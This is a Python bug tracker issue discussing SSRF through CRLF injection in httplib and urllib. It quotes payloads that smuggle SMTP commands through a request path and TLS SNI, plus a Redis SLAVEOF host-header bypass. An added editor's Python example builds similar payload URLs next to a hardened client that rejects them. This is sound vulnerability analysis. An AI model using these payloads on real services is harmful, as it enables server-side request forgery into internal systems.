Title: [Security] A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
Type: security Stage:
Components: Versions:
Status: open Resolution:
Dependencies: 30458 32185 Superseder:
Assigned To: Nosy List: christian.heimes, csabella, martin.panter, orange, vstinner
Priority: normal Keywords:

Created on 2017-11-20 14:15 by vstinner, last changed 2018-03-12 22:51 by csabella.

Messages (4)
msg306543 - (view) Author: STINNER Victor (vstinner) * (Python committer) Date: 2017-11-20 14:15
Vulnerabilities described below are likely these ones reported in bpo-30500, but it would be nice to double check if *all* reported vulnerabilities have been fixed!


At July 27, 2017, Orange Tsai (Security Consultant, DEVCORE) reported vulnerabilities in Python, in the code parsing URLs.


His following blog post only contains the vulnerabilities in Python:

Note: His twitter account,

== Issue 1 ==

* CR-LF Injection on HTTP protocol
* Smuggling SMTP protocol over HTTP protocol FROM
>> GET /
<< 421 4.7.0 ubuntu Rejecting open proxy localhost []
Connection closed

=> "SMTP Hates HTTP Protocol It Seems Unexploitable"

"Gopher Is Good What If There Is No Gopher Support?"

"HTTPS What Won't Be Encrypted in a SSL Handshake?"

== Issue 2 ==

* HTTPS: What Won't Be Encrypted in a SSL Handshake?
* Exploit the Unexploitable - Smuggling SMTP over TLS SNI□%0D%0AHELO□□FROM...:25/
<< 250 ubuntu Hello localhost [], please meet you
>> MAIL FROM: <>
<< 250 2.1.0 <>... Sender ok

== Big Picture ==

Python vulnerable to:

* Python httplib:

  * CR-LF Injection: Path, Host and SNI

* Python urllib: 

  * CR-LF Injection: Host and SNI
  * Host Injection

* Python urllib2

  * CR-LF Injection: Host and SNI
msg306980 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2017-11-26 01:00
The square □ in the strings represents a space.

Issue 1 (CRLF in HTTP request path): it looks like the %0D%0A would have to be decoded by an earlier step in the chain to "\r\nHELO . . .". This becomes like the header injection I mentioned in Issue 30458.

Issue 2 (CRLF in HTTPS host): it seems this doesn’t work in Python as a side effect of Issue 22928 blocking generation of the Host field. But if you add a space you bypass that: "https://host%0D%0A%20SLAVEOF . . .:6379".
msg307418 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2017-12-02 00:56
Issue 32185 proposes to stop sending IP addresses in the TLS SNI protocol. Maybe this will help; it depends if it will catch IP address strings with whitespace or if there are other ways to inject invalid hostnames.
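Added worked example (editor's illustration, not part of the issue thread, of Orange Tsai's slides, or of CPython's http.client): a small model of the three injection paths summarised in msg306543 and msg306980, the CRLF in the request path, the obs-fold Host header bypass, and the unencrypted SNI hostname, next to the checks a hardened client applies. The request builders stand in for what http.client does, the sample URLs are constructed to have the shape of the payloads quoted above (hosts and commands are placeholders), and the DISALLOWED, BARE_CRLF and HOSTNAME patterns are assumptions modelled on the checks discussed in Issues 22928, 30458 and 32185, not copies of library code.

```python
"""Model of the CRLF / SNI injection paths summarised in this issue.

Added illustration, not code from CPython or from the original slides: the
request builders below stand in for what http.client does, and the sample
URLs are constructed to have the same shape as the payloads quoted above.
"""
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Constructed inputs: an SMTP smuggle through the request path (Issue 1) and
# the obs-fold Host/SNI bypass from msg306980 (Issue 2). Hosts and commands
# are placeholders, not the original slides' exact URLs.
PATH_PAYLOAD = "http://127.0.0.1:25/%0D%0AHELO%20localhost%0D%0AMAIL%20FROM:%3C%3E"
HOST_OBSFOLD_PAYLOAD = "https://127.0.0.1%0D%0A%20SLAVEOF%20attacker%206379:6379/"

# What a hardened client refuses anywhere in a URL component: C0 controls,
# space and DEL (assumed here; the shape of the later http.client check, not
# a copy of it).
DISALLOWED = re.compile(r"[\x00-\x20\x7f]")
# A header-value check in the style of Issue 22928: bare CR or LF is refused,
# but CR LF followed by space/tab (obsolete line folding) is still accepted.
BARE_CRLF = re.compile(r"\n(?![ \t])|\r(?![ \t\n])")
# Plain LDH hostname syntax (assumption: IDNA/Unicode names are out of scope,
# and bracketed IPv6 literals are simply refused for SNI).
HOSTNAME = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\.?$"
)


def split_url(url):
    """Split the still-encoded URL, then percent-decode the pieces: the
    'decoded by an earlier step in the chain' situation from msg306980."""
    parts = urlsplit(url)
    host, sep, port = unquote(parts.netloc).rpartition(":")
    if not sep:
        host, port = port, ""
    return parts.scheme, host, port, unquote(parts.path) or "/"


def naive_request(url):
    """Concatenate the decoded pieces into the request line and Host header
    with no validation. Returns (sni_hostname, raw_request_bytes)."""
    scheme, host, port, path = split_url(url)
    authority = f"{host}:{port}" if port else host
    sni = host if scheme == "https" else None  # sent in the ClientHello, in clear
    raw = f"GET {path} HTTP/1.1\r\nHost: {authority}\r\n\r\n"
    return sni, raw.encode("latin-1")


def wire_lines(raw):
    """Lines a line-oriented listener (SMTP, Redis) would read as commands."""
    return raw.split(b"\r\n")


def header_value_ok(value):
    """Issue 22928-style check: stops bare CRLF, not an obs-fold continuation."""
    return BARE_CRLF.search(value) is None


def should_send_sni(host):
    """Issue 32185 behaviour (never send an IP literal as SNI) plus a syntax
    gate, so an IP-with-whitespace or CRLF string is refused as well."""
    try:
        ipaddress.ip_address(host)
        return False
    except ValueError:
        pass
    return HOSTNAME.match(host) is not None


def hardened_request(url):
    """Refuse any disallowed byte in path or host before it reaches the wire,
    and only offer SNI for a plausible DNS name."""
    scheme, host, port, path = split_url(url)
    for name, value in (("path", path), ("host", host)):
        hit = DISALLOWED.search(value)
        if hit:
            raise ValueError(f"{name} contains disallowed character {hit.group()!r}")
    authority = f"{host}:{port}" if port else host
    sni = host if scheme == "https" and should_send_sni(host) else None
    raw = f"GET {path} HTTP/1.1\r\nHost: {authority}\r\n\r\n"
    return sni, raw.encode("latin-1")


def hardened_rejects(url):
    """True if hardened_request refuses the URL."""
    try:
        hardened_request(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, url in (("path", PATH_PAYLOAD), ("host", HOST_OBSFOLD_PAYLOAD)):
        sni, raw = naive_request(url)
        print(f"[{label}] naive client: SNI={sni!r}")
        for line in wire_lines(raw):
            print("   >>", line)
        host = split_url(url)[1]
        print(f"[{label}] host passes Issue 22928 header check:", header_value_ok(host))
        print(f"[{label}] hardened client rejects:", hardened_rejects(url), "\n")
```

Running the module shows the naive client emitting `HELO localhost` and `MAIL FROM:<>` as their own lines for the path payload, and for the host payload a Host header whose folded continuation line ` SLAVEOF attacker 6379:6379` passes the Issue 22928 check while the same string would also have gone out as the SNI hostname. The hardened builder refuses both at the control-character check, and its SNI gate declines an IP literal or any string that is not plain hostname syntax, which is the caveat raised about IP strings with whitespace.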
msg313709 - (view) Author: Cheryl Sabella (csabella) * Date: 2018-03-12 22:51
Since issue 32185 has been patched, should this one be revisited to see if that solution helped fix this one?
Date                 User           Action  Args
2018-03-12 22:51:24  csabella       set     nosy: + csabella, christian.heimes
                                            messages: + msg313709
2017-12-02 00:56:07  martin.panter  set     dependencies: + SSLContext.wrap_socket sends SNI Extension when server_hostname is IP
                                            messages: + msg307418
2017-11-26 01:00:28  martin.panter  set     nosy: + orange, martin.panter
                                            dependencies: + CRLF Injection in httplib
                                            messages: + msg306980
2017-11-20 14:15:17  vstinner       create